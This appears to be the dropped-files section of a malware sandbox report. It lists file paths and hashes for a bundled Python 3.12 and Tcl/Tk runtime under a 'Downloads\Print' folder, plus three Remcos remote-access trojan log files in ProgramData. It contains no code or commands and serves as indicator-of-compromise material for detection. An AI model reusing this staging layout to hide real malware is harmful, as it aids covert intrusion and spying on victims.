SHA1 baa350987e3f3b936db33abc6ddfae0762d4c449
SHA256 58ba5f2c20d320c3f5390ff9778e03d341957bd37c5d3cf0c3327976979f2e01
SHA512 c9b006d3c76358aabf2636f73cdb1d6d56e8f09d4a9817fb80386cd71228e8c93f570f00798870a9ebcc15aae625923c7405fc6827928579f4f44a661e9ef6b7

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.tiff

MD5 d8580e24bfb05ec687436beb33838368
SHA1 99eefffec67780cc34ce21ea7c5b5b3073719011
SHA256 f19a80d1c7d5d758dcea82276e73150454212a5136b19c5fc2727786132ddafd
SHA512 de4c92d0a4f9747b13e9f0c2c1d88e8d8d2151cbe693651e248b72cee43bacf13f0968db9a6d8f2abb2a1c74b4fb5ebc0358651586d4e66da3dc02e63e5afc7c

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.webp

MD5 d4d9cee903091f613295efe4b5935689
SHA1 152fb2d413cee0e7c560351c904c2b1a1bb2380a
SHA256 d87f8d1367c93897805ee274c0e53ddbb0a46525aadb7dd32756fb85ad74e8b0
SHA512 67032fb0cce8001db79462bbe9653db4a80605b72077aaee9a2db85c0af6a223d2f452185112420afdf5922358aa07eda410c791efcf247201354816fb014011

C:\Users\Admin\Downloads\Print\Python312\Lib\test\imghdrdata\python.xbm

MD5 e6d79a573ec495b479a2c6e4f77f134b
SHA1 06f1b0de642132260c8067744cd6dd119c1a5ed2
SHA256 e7ff41947d7400cbe040e622d9ba92c40127355ffd96f182a54b8a80118e7c0b
SHA512 604179f7be08029ade027b2883983d8b524c0db9713a0646e007f608765db3d58c14e9be74c43e494b5462cca5c47494c06943ef04e82c129d1acad293c66e6b

C:\Users\Admin\Downloads\Print\Python312\Lib\test\sndhdrdata\sndhdr.aifc

MD5 a8a96fc714afadc15f870716186876f4
SHA1 21586b8440f26424f1b8ab66c338664f010c3cb7
SHA256 884528c663a2c5bc5977c54655699389e6d31420d0e79ac6fccac835ee0b167e
SHA512 ec64e6cca3f45438087c6e4c02a16218b17bd5c38e48c68d30c42d334607c8eaa188263eae56bb452244673d3bac75632f625b22f1862bf7e2b0a2585b17dc2a

C:\Users\Admin\Downloads\Print\Python312\Lib\test\sndhdrdata\sndhdr.aiff

MD5 3d4d023133dc4e66488dd5fd8d972124
SHA1 f93f56d42e08ad7e80b6fbe7aa1c76b8b994de3f
SHA256 3636198f2e61362121c9f7adfbde802883c99e6b23977e4e0bbbbd042b307421
SHA512 9e1dd8887ac56417cc516d0ba680749b351ae7b12770e188b56deedf4971586df81d7825a48afaa47554b4bd8edf427beacdf81336959c58ad6f13d4ea5b37a1

C:\Users\Admin\Downloads\Print\Python312\Lib\test\sndhdrdata\sndhdr.wav

MD5 eb0b6503152295540c09094b1d64a6a3
SHA1 d82d8deb9f0c69515fdaec06bcb9345472bbd94c
SHA256 54e018785efc750bbbafe910f4b4e4240995b5a2143a4341dc5c1bb73151c1d8
SHA512 1b3edf97c8f6cc247c532ff7640c660c73bbcd4ff769c21fa7dd550fcb799a304b5aabe6a6b73ac878f7e11570651a264c3c31ca3a3f81cbe19fcef5c4f61140

C:\Users\Admin\Downloads\Print\Python312\Lib\test\test_import\data\circular_imports\subpkg\util.py

MD5 26de9aa26f4f0b109363b91eb9f8bb97
SHA1 f86b316ac1901528bb35fe725cf08b8017a93cdc
SHA256 0a00579f58936a271c5a5e903d2d4f26bfa11347f83222f217263bf2ecfd546c
SHA512 c6d1cccec9cc49cad8f16fe1795adba660beacdff157daa175bcc96da4eb92afba294ffc32fe3dae87ff6399c0a98a3475040f5aa92db8129b94d0d05d516e5e

C:\Users\Admin\Downloads\Print\Python312\Lib\test\test_importlib\namespace_pkgs\not_a_namespace_pkg\foo\one.py

MD5 002c0c3dd72075ea93c1f9f17bc55009
SHA1 c8b6fb242803e9b5cdb675455f6bc8d585d04d0e
SHA256 8f083d9f27afa6518d7b058bb322d3e79c0becf9f38a96334ad7a3cc4b3483fa
SHA512 1598b79a6357932b08b3ab8d6b6af424a697d7770b71984808f9d2375bb64ef68e31f23106d8b4dcb4d70cbb814497298cb6133c67eae83035b561848110c20d

C:\Users\Admin\Downloads\Print\Python312\Lib\test\test_importlib\resources\data01\utf-16.file

MD5 ff6357f0940465f479305cbe0ba8f78f
SHA1 3bf88b182117dce769d0cb03fb14ab771f827649
SHA256 b79abdaa1c57d2b62a22d04e33c0f7ca5c06f911eb9ce62d7932ed42beac17b8
SHA512 11989f26c71c2879e0083fb436286238f50069ea3c7771c5b25b278e589ad4262a12f580a8c082fea291f0264f1ac212a169ea4ec5b44b1232070cc9797a0307

C:\Users\Admin\Downloads\Print\Python312\Lib\test\test_importlib\resources\data01\utf-8.file

MD5 58da4ec0dd953291e42b4a78598913da
SHA1 7e13931923104bda5ae0fe40db20d0aaf51610f9
SHA256 9305a0606e3243e645d97fd603ae848d83e6c49467fb0f1a48e892f5ef2d2986
SHA512 039c0ad2c558a7d3a5d26e5e2872833c84d837947851085989c44ef5c5c17f4381197284e19b2c96767a2646ed23ab360c6a2ad533b79f078e744655ce4c5ccd

C:\Users\Admin\Downloads\Print\Python312\Lib\test\test_unittest\__init__.py

MD5 e1b27d214a1714271983ee7f7f5c9f37
SHA1 c62c91feeb1f5ae570b5c9c03ae29ee445639429
SHA256 329743706d4d31db91597c27c0e61f754473b15fb89c52b67ffbd5d6b9d6041a
SHA512 a0a7604f0c7abcbb677fd182345f04be971b40a784bcf28efe62eee18090672222468791e981754b1900b9f0830139ea9bf09e2103e3b0e9a1a5adca26cdba09

C:\Users\Admin\Downloads\Print\Python312\pythonw.exe

MD5 9495073209d324b0da226eaf8e5ed8de
SHA1 9556dc9b2aecb25d2e963589f2906456470cbb49
SHA256 3373ac4a982e454a865fe13735bbc89a5c8279764051b6d4359211533b92bd2f
SHA512 0677f1a93b73d8dd8605a660e41b5f4d570aee8021ba1563a094aaf901ad3dd600f9dafa24f36103b46c80d22b27ab9f69c540b3d4c1025f4efea1687795c752

C:\Users\Admin\Downloads\Print\Python312\tcl\tcl8.6\encoding\euc-cn.enc

MD5 c5aa0d11439e0f7682dae39445f5dab4
SHA1 73a6d55b894e89a7d4cb1cd3ccff82665c303d5c
SHA256 1700af47dc012a48cec89cf1dfae6d1d0d2f40ed731eff6ca55296a055a11c00
SHA512 eee6058bd214c59bcc11e6de7265da2721c119cc9261cfd755a98e270ff74d2d73e3e711aa01a0e3414c46d82e291ef0df2ad6c65ca477c888426d5a1d2a3bc5

C:\Users\Admin\Downloads\Print\Python312\tcl\tix8.4.3\demos\bitmaps\drivea.xbm

MD5 a4ec724dc948f7094dc0eacb5a960f40
SHA1 0fcfe0dd79a951a593256a7257a7410a0294f546
SHA256 459e941ecd87984672bf1255da19a8de74f114e173e838f6b85ac734e7ef5fd1
SHA512 2c6ccda98d2c665dffb7e7340ad44822780e20e3ebb0493b58a313c0c46a62bb21be94ca0e3226aa52f410cf6ce3f0c2b2c95a0434c6e0678e77ec4ca55eec32

C:\Users\Admin\Downloads\Print\Python312\tcl\tix8.4.3\demos\bitmaps\drivea.xpm

MD5 93d39c85d0d9052a1eb932904e93da24
SHA1 6fd812fca35b166ba57c7a4e4a21c3d1a371959d
SHA256 05164d5becdda54104b20bc8f7358f627be9f2602d6b3e344a3033d92e73d148
SHA512 7032169b5952043fefb0856c01acf7cfa1632a4ecab4f460b0634cd8d5bc0de270f32586246b44eca13ce555bc893d44b1f659e125fef1fb1854dfb4ed89be55

C:\Users\Admin\Downloads\Print\Python312\tcl\tix8.4.3\demos\bitmaps\netw.xbm

MD5 23f6b504a1004a9a2c91d0fcf5bce9b2
SHA1 4ea189c3af76a7df714c397bea1e32c1625d115c
SHA256 9efee21d14731a4d7b3bd7d9e3c02198bca7195173e009c25ef54a7538c93780
SHA512 0b82bdfebb4fad94b74207d23616633eee955f8203a020f4f4b957e61efece1609440741a60822e4884fadf4dddf43cae34b519b64a5e018e7a8031e8cd561b4

C:\Users\Admin\Downloads\Print\Python312\tcl\tix8.4.3\demos\bitmaps\netw.xpm

MD5 5165aae8ed4c6ee20b9aa6c3304e8042
SHA1 2404f7443e8797e335dd6bd93d8cf67dec291482
SHA256 068e6f025c1e4bb5b019ff51416fcedd4e5d211d5fca99412b19ded1295b2556
SHA512 ba573c5eb9f92f5c31236a35b021b366e4450b26f077f4c0f18ffd7f83a590e8e8415f7ecf057186ae0b0178ba04b13f5060c705c4a05fdd1a1ed4ffb911d0a9

C:\Users\Admin\Downloads\Print\Python312\tcl\tk8.6\demos\images\tcllogo.gif

MD5 ff04b357b7ab0a8b573c10c6da945d6a
SHA1 bcb73d8af2628463a1b955581999c77f09f805b8
SHA256 72f6b34d3c8f424ff0a290a793fcfbf34fd5630a916cd02e0a5dda0144b5957f
SHA512 10dfe631c5fc24cf239d817eefa14329946e26ed6bcfc1b517e2f9af81807977428ba2539aaa653a89a372257d494e8136fd6abbc4f727e6b199400de05accd5

C:\Users\Admin\Downloads\Print\Python312\tcl\tk8.6\demos\license.terms

MD5 f090d9b312c16489289fd39813412164
SHA1 1bec6668f6549771dadc67d153b89b8f77dcd4b9
SHA256 0d1e4405f6273f091732764ed89b57066be63ce64869be6c71ea337dc4f2f9b5
SHA512 57b323589c5a8d9cbb224416731d8ce65c4b94146df15ce30885df63b1d0b3f709093b65390a911f84f20b7c5de3c0af9b4d7d531742be046eda6e8c3432ef6e

C:\ProgramData\remcos\logs.dat

MD5 eac8f34d68934b397fdc85c7e9b30cf9
SHA1 d4872018065d9d970751233b06c8c39ac873208b
SHA256 e80bae9d1c40adbc65df5b8a2d1cc35dcc8f22e60c99e93cb8799a9d14b61c17
SHA512 0e56ea729702e9e40ab44655473e5b41218abb9e3a9678012a433fc7c9046d70308c4a687e14ff43826a5bafa9c776f2b7a2c24419d8bc012e1bce20932d3b0a

C:\ProgramData\remcos\logs.dat

MD5 abd081552145364e3d387ff13352c70e
SHA1 678372041387b553f2b242ad22b6b0198adfa627
SHA256 52f06181de986c1a215f019e18eb40bf481d23baf7d6ef968963594e999de1d9
SHA512 46514095ef402f56b62f532ae7f87f66c5fccaf6663514e391032bd43206c70a3ca58c9a5054e3cb60d3f4bcb9c5d5cfbe4e6ab8241932efbacc6f0f403c0e02

C:\ProgramData\remcos\logs.dat

MD5 10d4528f3b10ffced5fc53b9c3417261
SHA1 5cc4465f73e7dc282052fd4509dfcf62b6de93bd
SHA256 554a04dfcc54b43d3ebfc3981af7ab3d98871b84127b3376261d5e8a3d4438a8
SHA512 2e2a73913189b2ab1eed1aef07d55baa94d14c039ff300af318a17602937ad164ace5685be03e0191901a3161609edd8b4049306f3adb2db21cbbdd28549e805